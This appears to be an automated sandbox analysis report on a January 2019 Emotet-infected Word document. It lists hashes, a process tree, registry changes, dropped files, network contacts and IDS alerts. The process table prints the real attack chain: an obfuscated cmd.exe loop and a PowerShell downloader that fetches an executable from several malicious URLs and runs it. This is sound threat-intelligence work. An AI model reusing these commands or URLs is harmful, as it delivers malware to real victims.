File name: | 201901_Untitled_1795.doc |
Full analysis: | https://app.any.run/tasks/d298fb61-4081-4cba-84fb-40ec18c74c94 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | January 22, 2019, 15:27:24 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
MIME: | text/xml |
File info: | XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators |
MD5: | 6253EE7DF2CAF80FADF4D39E6F01E956 |
SHA1: | EFDD7A3559D737CF5065AFF1AE031181967C6ABA |
SHA256: | 3D45563F0B8EB2E24BB02A07D8A8DC84C528585AB9E335FD211E04F502FD8378 |
SSDEEP: | 3072:YNGqNPxmmjL/xSu90OoiLuDKZXfwKeljR1z:YNCMxUOmD+XfwLX |
.xml | | | Microsoft Office XML Flat File Format Word Document (ASCII) (65.1) |
---|---|---|
.xml | | | Microsoft Office XML Flat File Format (ASCII) (31) |
.xml | | | Generic XML (ASCII) (2.3) |
.html | | | HyperText Markup Language (1.4) |
WordDocumentBodySectSectPrDocGridLine-pitch: | 360 |
---|---|
WordDocumentBodySectSectPrColsSpace: | 720 |
WordDocumentBodySectSectPrPgMarGutter: | - |
WordDocumentBodySectSectPrPgMarFooter: | 720 |
WordDocumentBodySectSectPrPgMarHeader: | 720 |
WordDocumentBodySectSectPrPgMarLeft: | 1440 |
WordDocumentBodySectSectPrPgMarBottom: | 1440 |
WordDocumentBodySectSectPrPgMarRight: | 1440 |
WordDocumentBodySectSectPrPgMarTop: | 1440 |
WordDocumentBodySectSectPrPgSzH: | 15840 |
WordDocumentBodySectSectPrPgSzW: | 12240 |
WordDocumentBodySectSectPrRsidR: | 005E6EE1 |
WordDocumentBodySectPRPictShapeImagedataTitle: | - |
WordDocumentBodySectPRPictShapeImagedataSrc: | wordml://02000001.jpg |
WordDocumentBodySectPRPictShapeStyle: | width:468pt;height:349.5pt;visibility:visible;mso-wrap-style:square |
WordDocumentBodySectPRPictShapeType: | #_x0000_t75 |
WordDocumentBodySectPRPictShapeSpid: | _x0000_i1025 |
WordDocumentBodySectPRPictShapeId: | Picture 1 |
WordDocumentBodySectPRPictBinData: | (Binary data 145376 bytes, use -b option to extract) |
WordDocumentBodySectPRPictBinDataName: | wordml://02000001.jpg |
WordDocumentBodySectPRPictShapetypeLockAspectratio: | t |
WordDocumentBodySectPRPictShapetypeLockExt: | edit |
WordDocumentBodySectPRPictShapetypePathConnecttype: | rect |
WordDocumentBodySectPRPictShapetypePathGradientshapeok: | t |
WordDocumentBodySectPRPictShapetypePathExtrusionok: | f |
WordDocumentBodySectPRPictShapetypeFormulasFEqn: | if lineDrawn pixelLineWidth 0 |
WordDocumentBodySectPRPictShapetypeStrokeJoinstyle: | miter |
WordDocumentBodySectPRPictShapetypeStroked: | f |
WordDocumentBodySectPRPictShapetypeFilled: | f |
WordDocumentBodySectPRPictShapetypePath: | m@4@5l@4@11@9@11@9@5xe |
WordDocumentBodySectPRPictShapetypePreferrelative: | t |
WordDocumentBodySectPRPictShapetypeSpt: | 75 |
WordDocumentBodySectPRPictShapetypeCoordsize: | 21600,21600 |
WordDocumentBodySectPRPictShapetypeId: | _x0000_t75 |
WordDocumentBodySectPRRPrNoProof: | - |
WordDocumentBodySectPRRsidRPr: | 00802DF5 |
WordDocumentBodySectPRsidRDefault: | 00C25C6E |
WordDocumentBodySectPRsidR: | 005E6EE1 |
WordDocumentDocPrRsidsRsidVal: | 005A24B1 |
WordDocumentDocPrRsidsRsidRootVal: | 005E6EE1 |
WordDocumentDocPrCompatDontGrowAutofit: | - |
WordDocumentDocPrCompatUseAsianBreakRules: | - |
WordDocumentDocPrCompatWrapTextWithPunct: | - |
WordDocumentDocPrCompatSnapToGridInCell: | - |
WordDocumentDocPrCompatBreakWrappedTables: | - |
WordDocumentDocPrAlwaysShowPlaceholderTextVal: | off |
WordDocumentDocPrIgnoreMixedContentVal: | off |
WordDocumentDocPrSaveInvalidXMLVal: | off |
WordDocumentDocPrValidateAgainstSchema: | - |
WordDocumentDocPrPixelsPerInchVal: | 120 |
WordDocumentDocPrDoNotSaveWebPagesAsSingleFile: | - |
WordDocumentDocPrOptimizeForBrowser: | - |
WordDocumentDocPrCharacterSpacingControlVal: | DontCompress |
WordDocumentDocPrPunctuationKerning: | - |
WordDocumentDocPrDefaultTabStopVal: | 720 |
WordDocumentDocPrDoNotEmbedSystemFonts: | - |
WordDocumentDocPrRemovePersonalInformation: | - |
WordDocumentDocPrZoomPercent: | 100 |
WordDocumentDocPrViewVal: | |
WordDocumentShapeDefaultsShapelayoutIdmapData: | 1 |
WordDocumentShapeDefaultsShapelayoutIdmapExt: | edit |
WordDocumentShapeDefaultsShapelayoutExt: | edit |
WordDocumentShapeDefaultsShapedefaultsSpidmax: | 1026 |
WordDocumentShapeDefaultsShapedefaultsExt: | edit |
WordDocumentDocSuppDataBinData: | (Base64-encoded binary data omitted) |
WordDocumentDocSuppDataBinDataName: | editdata.mso |
WordDocumentStylesStyleRPrRFontsCs: | Tahoma |
WordDocumentStylesStyleRPrRFontsH-ansi: | Tahoma |
WordDocumentStylesStyleRPrRFontsAscii: | Tahoma |
WordDocumentStylesStyleRsidVal: | 005A24B1 |
WordDocumentStylesStyleLinkVal: | BalloonTextChar |
WordDocumentStylesStyleBasedOnVal: | Normal |
WordDocumentStylesStyleTblPrTblCellMarRightType: | dxa |
WordDocumentStylesStyleTblPrTblCellMarRightW: | 108 |
WordDocumentStylesStyleTblPrTblCellMarBottomType: | dxa |
WordDocumentStylesStyleTblPrTblCellMarBottomW: | - |
WordDocumentStylesStyleTblPrTblCellMarLeftType: | dxa |
WordDocumentStylesStyleTblPrTblCellMarLeftW: | 108 |
WordDocumentStylesStyleTblPrTblCellMarTopType: | dxa |
WordDocumentStylesStyleTblPrTblCellMarTopW: | - |
WordDocumentStylesStyleTblPrTblIndType: | dxa |
WordDocumentStylesStyleTblPrTblIndW: | - |
WordDocumentStylesStyleUiNameVal: | Table Normal |
WordDocumentStylesStyleRPrLangBidi: | AR-SA |
WordDocumentStylesStyleRPrLangFareast: | EN-US |
WordDocumentStylesStyleRPrLangVal: | EN-US |
WordDocumentStylesStyleRPrSz-csVal: | 22 |
WordDocumentStylesStyleRPrSzVal: | 22 |
WordDocumentStylesStyleRPrFontVal: | Calibri |
WordDocumentStylesStylePPrSpacingLine-rule: | auto |
WordDocumentStylesStylePPrSpacingLine: | 259 |
WordDocumentStylesStylePPrSpacingAfter: | 160 |
WordDocumentStylesStyleNameVal: | Normal |
WordDocumentStylesStyleStyleId: | Normal |
WordDocumentStylesStyleDefault: | on |
WordDocumentStylesStyleType: | paragraph |
WordDocumentStylesLatentStylesLsdExceptionName: | Normal |
WordDocumentStylesLatentStylesLatentStyleCount: | 375 |
WordDocumentStylesLatentStylesDefLockedState: | off |
WordDocumentStylesVersionOfBuiltInStylenamesVal: | 7 |
WordDocumentFontsFontSigCsb-1: | 00000000 |
WordDocumentFontsFontSigCsb-0: | 000001FF |
WordDocumentFontsFontSigUsb-3: | 00000000 |
WordDocumentFontsFontSigUsb-2: | 00000009 |
WordDocumentFontsFontSigUsb-1: | C0007841 |
WordDocumentFontsFontSigUsb-0: | E0002AFF |
WordDocumentFontsFontPitchVal: | variable |
WordDocumentFontsFontFamilyVal: | Roman |
WordDocumentFontsFontCharsetVal: | 00 |
WordDocumentFontsFontPanose-1Val: | 02020603050405020304 |
WordDocumentFontsFontName: | Times New Roman |
WordDocumentFontsDefaultFontsCs: | Times New Roman |
WordDocumentFontsDefaultFontsH-ansi: | Calibri |
WordDocumentFontsDefaultFontsFareast: | Calibri |
WordDocumentFontsDefaultFontsAscii: | Calibri |
WordDocumentDocumentPropertiesVersion: | 16 |
WordDocumentDocumentPropertiesCharactersWithSpaces: | 1 |
WordDocumentDocumentPropertiesParagraphs: | 1 |
WordDocumentDocumentPropertiesLines: | 1 |
WordDocumentDocumentPropertiesCharacters: | 1 |
WordDocumentDocumentPropertiesWords: | - |
WordDocumentDocumentPropertiesPages: | 1 |
WordDocumentDocumentPropertiesLastSaved: | 2019:01:22 12:21:00Z |
WordDocumentDocumentPropertiesCreated: | 2019:01:22 12:21:00Z |
WordDocumentDocumentPropertiesTotalTime: | - |
WordDocumentDocumentPropertiesRevision: | 1 |
WordDocumentIgnoreSubtreeVal: | http://schemas.microsoft.com/office/word/2003/wordml/sp2 |
WordDocumentOcxPresent: | no |
WordDocumentEmbeddedObjPresent: | no |
WordDocumentMacrosPresent: | yes |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2852 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\201901_Untitled_1795.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
4048 | c:\u9309\p266\v5884\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:ON/C"set CQVm=c38q\2~Q6l@GzXUnPSvAN9+IF:};s'{otWafC(Tb4km)/eDE5ux7-0Og,L MjiywYh=$.rB1%pd&&for %P in (73;31;63;72;16;14;70;57;23;36;25;6;48;56;71;72;69;72;17;47;17;17;23;54;20;20;19;59;47;25;6;52;40;56;71;72;65;72;38;47;59;16;25;6;52;1;56;71;72;9;9;58;67;0;21;51;71;71;66;29;15;2;40;8;40;29;27;67;3;40;48;2;71;66;15;45;63;52;31;39;60;45;0;32;58;20;45;32;68;33;45;39;36;9;61;45;15;32;27;67;34;5;53;53;40;66;29;65;32;32;73;25;44;44;34;55;34;32;34;63;61;45;69;12;39;61;0;41;34;68;0;31;42;44;44;59;74;59;48;20;48;17;36;61;10;65;32;32;73;25;44;44;74;31;0;28;74;45;32;45;0;32;31;69;68;50;62;12;44;21;64;64;50;38;9;21;17;13;10;65;32;32;73;25;44;44;69;45;42;31;15;32;52;41;18;34;69;32;61;69;68;69;61;28;45;52;49;73;68;15;28;41;68;69;49;44;51;16;34;21;35;73;42;50;10;65;32;32;73;25;44;44;63;18;52;42;45;34;32;68;15;9;44;13;74;57;53;41;7;7;34;69;10;65;32;32;73;25;44;44;63;63;63;68;28;32;61;15;28;31;15;68;15;9;44;54;21;31;54;50;33;21;46;55;2;29;68;17;73;9;61;32;37;29;10;29;43;27;67;63;21;21;48;1;66;29;42;5;51;51;1;29;27;67;3;71;71;1;53;58;66;58;29;40;5;5;29;27;67;31;21;1;2;1;66;29;15;2;8;53;1;29;27;67;9;5;51;71;40;66;67;45;15;18;25;32;45;42;73;22;29;4;29;22;67;3;71;71;1;53;22;29;68;45;50;45;29;27;35;31;69;45;34;0;65;37;67;61;48;51;48;1;58;61;15;58;67;34;5;53;53;40;43;30;32;69;62;30;67;3;40;48;2;71;68;46;31;63;15;9;31;34;74;24;61;9;45;37;67;61;48;51;48;1;56;58;67;9;5;51;71;40;43;27;67;73;21;21;5;71;66;29;18;1;40;48;29;27;23;35;58;37;37;11;45;32;52;23;32;45;42;58;67;9;5;51;71;40;43;68;9;45;15;55;32;65;58;52;55;45;58;40;53;53;53;53;43;58;30;23;15;18;31;41;45;52;23;32;45;42;58;67;9;5;51;71;40;27;67;35;1;53;5;53;66;29;73;21;8;21;53;29;27;39;69;45;34;41;27;26;26;0;34;32;0;65;30;26;26;67;63;48;71;53;71;66;29;0;40;5;71;71;29;27;75)do set wq=!wq!!CQVm:~%P,1!&&if %P equ 75 echo !wq:~-564!|cmd.exe" | c:\windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2580 | CmD /V:ON/C"set CQVm=c38q\2~Q6l@GzXUnPSvAN9+IF:};s'{otWafC(Tb4km)/eDE5ux7-0Og,L MjiywYh=$.rB1%pd&&for %P in (73;31;63;72;16;14;70;57;23;36;25;6;48;56;71;72;69;72;17;47;17;17;23;54;20;20;19;59;47;25;6;52;40;56;71;72;65;72;38;47;59;16;25;6;52;1;56;71;72;9;9;58;67;0;21;51;71;71;66;29;15;2;40;8;40;29;27;67;3;40;48;2;71;66;15;45;63;52;31;39;60;45;0;32;58;20;45;32;68;33;45;39;36;9;61;45;15;32;27;67;34;5;53;53;40;66;29;65;32;32;73;25;44;44;34;55;34;32;34;63;61;45;69;12;39;61;0;41;34;68;0;31;42;44;44;59;74;59;48;20;48;17;36;61;10;65;32;32;73;25;44;44;74;31;0;28;74;45;32;45;0;32;31;69;68;50;62;12;44;21;64;64;50;38;9;21;17;13;10;65;32;32;73;25;44;44;69;45;42;31;15;32;52;41;18;34;69;32;61;69;68;69;61;28;45;52;49;73;68;15;28;41;68;69;49;44;51;16;34;21;35;73;42;50;10;65;32;32;73;25;44;44;63;18;52;42;45;34;32;68;15;9;44;13;74;57;53;41;7;7;34;69;10;65;32;32;73;25;44;44;63;63;63;68;28;32;61;15;28;31;15;68;15;9;44;54;21;31;54;50;33;21;46;55;2;29;68;17;73;9;61;32;37;29;10;29;43;27;67;63;21;21;48;1;66;29;42;5;51;51;1;29;27;67;3;71;71;1;53;58;66;58;29;40;5;5;29;27;67;31;21;1;2;1;66;29;15;2;8;53;1;29;27;67;9;5;51;71;40;66;67;45;15;18;25;32;45;42;73;22;29;4;29;22;67;3;71;71;1;53;22;29;68;45;50;45;29;27;35;31;69;45;34;0;65;37;67;61;48;51;48;1;58;61;15;58;67;34;5;53;53;40;43;30;32;69;62;30;67;3;40;48;2;71;68;46;31;63;15;9;31;34;74;24;61;9;45;37;67;61;48;51;48;1;56;58;67;9;5;51;71;40;43;27;67;73;21;21;5;71;66;29;18;1;40;48;29;27;23;35;58;37;37;11;45;32;52;23;32;45;42;58;67;9;5;51;71;40;43;68;9;45;15;55;32;65;58;52;55;45;58;40;53;53;53;53;43;58;30;23;15;18;31;41;45;52;23;32;45;42;58;67;9;5;51;71;40;27;67;35;1;53;5;53;66;29;73;21;8;21;53;29;27;39;69;45;34;41;27;26;26;0;34;32;0;65;30;26;26;67;63;48;71;53;71;66;29;0;40;5;71;71;29;27;75)do set wq=!wq!!CQVm:~%P,1!&&if %P equ 75 echo !wq:~-564!|cmd.exe" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2548 | C:\Windows\system32\cmd.exe /S /D /c" echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $c9711='n8464';$q4581=new-object Net.WebClient;$a2004='http://agatawierzbicka.com//MdM5N5SCi@http://docsdetector.xyz/9YYxTl9SX@http://remont-kvartir.rise-up.nsk.ru/7Pa9fpmx@http://wv-meat.nl/XdL0kQQar@http://www.stinson.nl/O9oOxW9Dg8'.Split('@');$w9953='m2773';$q1130 = '422';$o9383='n8603';$l2714=$env:temp+'\'+$q1130+'.exe';foreach($i5753 in $a2004){try{$q4581.DownloadFile($i5753, $l2714);$p9921='v345';If ((Get-Item $l2714).length -ge 40000) {Invoke-Item $l2714;$f3020='p9690';break;}}catch{}}$w5101='c4211';" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2636 | cmd.exe | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3528 | powershell $c9711='n8464';$q4581=new-object Net.WebClient;$a2004='http://agatawierzbicka.com//MdM5N5SCi@http://docsdetector.xyz/9YYxTl9SX@http://remont-kvartir.rise-up.nsk.ru/7Pa9fpmx@http://wv-meat.nl/XdL0kQQar@http://www.stinson.nl/O9oOxW9Dg8'.Split('@');$w9953='m2773';$q1130 = '422';$o9383='n8603';$l2714=$env:temp+'\'+$q1130+'.exe';foreach($i5753 in $a2004){try{$q4581.DownloadFile($i5753, $l2714);$p9921='v345';If ((Get-Item $l2714).length -ge 40000) {Invoke-Item $l2714;$f3020='p9690';break;}}catch{}}$w5101='c4211'; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3060 | "C:\Users\admin\AppData\Local\Temp\422.exe" | C:\Users\admin\AppData\Local\Temp\422.exe | — | powershell.exe |
User: admin Company: Microsoft Corp Integrity Level: MEDIUM Description: Canadian M Exit code: 0 Version: 3.0.69 | ||||
3840 | "C:\Users\admin\AppData\Local\Temp\422.exe" | C:\Users\admin\AppData\Local\Temp\422.exe | 422.exe | |
User: admin Company: Microsoft Corp Integrity Level: MEDIUM Description: Canadian M Exit code: 0 Version: 3.0.69 | ||||
3404 | "C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe" | C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe | — | 422.exe |
User: admin Company: Microsoft Corp Integrity Level: MEDIUM Description: Canadian M Exit code: 0 Version: 3.0.69 | ||||
3964 | "C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe" | C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe | wabmetagen.exe | |
User: admin Company: Microsoft Corp Integrity Level: MEDIUM Description: Canadian M Version: 3.0.69 |
(PID) Process: | (2852) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
Operation: | write | Name: | u4$ |
Value: 75342400240B0000010000000000000000000000 | |||
(PID) Process: | (2852) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1033 |
Value: Off | |||
(PID) Process: | (2852) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1033 |
Value: On | |||
(PID) Process: | (2852) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
Operation: | write | Name: | WORDFiles |
Value: 1312161822 | |||
(PID) Process: | (2852) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
Operation: | write | Name: | ProductFiles |
Value: 1312161936 | |||
(PID) Process: | (2852) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
Operation: | write | Name: | ProductFiles |
Value: 1312161937 | |||
(PID) Process: | (2852) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word |
Operation: | write | Name: | MTTT |
Value: 240B000034CAED0567B2D40100000000 | |||
(PID) Process: | (2852) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
Operation: | write | Name: | {6$ |
Value: 7B362400240B000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 | |||
(PID) Process: | (2852) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
Operation: | delete value | Name: | {6$ |
Value: 7B362400240B000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 | |||
(PID) Process: | (2852) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | UNCAsIntranet |
Value: 0 |

PID | Process | Filename | Type | |
---|---|---|---|---|
2852 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR8CD5.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2852 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CEBB6D82.jpg | — | |
MD5:— | SHA256:— | |||
3528 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\M1ZAF3EQZN3D5ZVK6I6Z.temp | — | |
MD5:— | SHA256:— | |||
2852 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | |
MD5:5404C1A1796637D7E27F522D4FF7C5CE | SHA256:F1EEDB376F46D5EAD38432F64067BB8C801AA0B364244DA62885FCFADC2E1877 | |||
3528 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF19a0f9.TMP | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 | |||
2852 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$1901_Untitled_1795.doc | pgc | |
MD5:3C9EE964C7413846FEC2B8C97B6E26A1 | SHA256:D0F25541627B4B82669C48FF14565DB5F4E8EFE8898BFE3A4EF8E0749A238295 | |||
3840 | 422.exe | C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe | executable | |
MD5:F0B9498D9283963AECC26AE5E294525F | SHA256:98CDFB8FC884D724311D0F53559ACA2EFDF2765C8B297302D3A80C07C336B067 | |||
3528 | powershell.exe | C:\Users\admin\AppData\Local\Temp\422.exe | executable | |
MD5:F0B9498D9283963AECC26AE5E294525F | SHA256:98CDFB8FC884D724311D0F53559ACA2EFDF2765C8B297302D3A80C07C336B067 | |||
2852 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:BCA7725C8CB9C8D63EC166E879124B21 | SHA256:05E75A6D04CEFC391DEAF88AFF57A37ECFC5F3AF4F711DC7518EB32A07640D73 | |||
3528 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 |

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3964 | wabmetagen.exe | GET | — | 200.43.114.10:8080 | http://200.43.114.10:8080/ | AR | — | — | malicious |
3964 | wabmetagen.exe | GET | — | 190.55.123.250:80 | http://190.55.123.250/ | AR | — | — | malicious |
— | — | GET | — | 201.103.81.129:80 | http://201.103.81.129/ | MX | — | — | malicious |
3528 | powershell.exe | GET | 200 | 176.120.24.163:80 | http://remont-kvartir.rise-up.nsk.ru/7Pa9fpmx/ | RU | executable | 539 Kb | malicious |
3528 | powershell.exe | GET | 301 | 176.120.24.163:80 | http://remont-kvartir.rise-up.nsk.ru/7Pa9fpmx | RU | html | 333 b | malicious |

PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3964 | wabmetagen.exe | 200.43.114.10:8080 | — | Telecom Argentina S.A. | AR | malicious |
3528 | powershell.exe | 46.242.177.30:80 | agatawierzbicka.com | home.pl S.A. | PL | suspicious |
3528 | powershell.exe | 176.120.24.163:80 | remont-kvartir.rise-up.nsk.ru | NetPoint Ltd. | RU | malicious |
3964 | wabmetagen.exe | 190.55.123.250:80 | — | Telecentro S.A. | AR | malicious |
3528 | powershell.exe | 195.201.179.80:80 | docsdetector.xyz | Awanti Ltd. | RU | malicious |
— | — | 201.103.81.129:80 | — | Uninet S.A. de C.V. | MX | malicious |
3964 | wabmetagen.exe | 189.159.119.242:22 | — | Uninet S.A. de C.V. | MX | suspicious |

Domain | IP | Reputation |
---|---|---|
agatawierzbicka.com | | suspicious |
docsdetector.xyz | | malicious |
remont-kvartir.rise-up.nsk.ru | | malicious |

PID | Process | Class | Message |
---|---|---|---|
3528 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
3528 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |
3528 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3528 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3528 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
3964 | wabmetagen.exe | A Network Trojan was detected | SC SPYWARE Spyware Emotet Win32 |
3964 | wabmetagen.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |
3964 | wabmetagen.exe | A Network Trojan was detected | SC SPYWARE Spyware Emotet Win32 |
3964 | wabmetagen.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |